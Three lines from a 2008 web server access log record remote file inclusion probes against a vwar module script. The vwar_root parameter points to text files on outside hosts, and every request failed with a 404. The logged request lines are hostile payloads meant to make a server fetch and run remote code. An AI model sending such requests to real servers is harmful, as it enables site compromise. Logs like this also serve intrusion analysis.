75.125.151.18 - - [08/Dec/2008:09:50:39 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:48 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:51 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
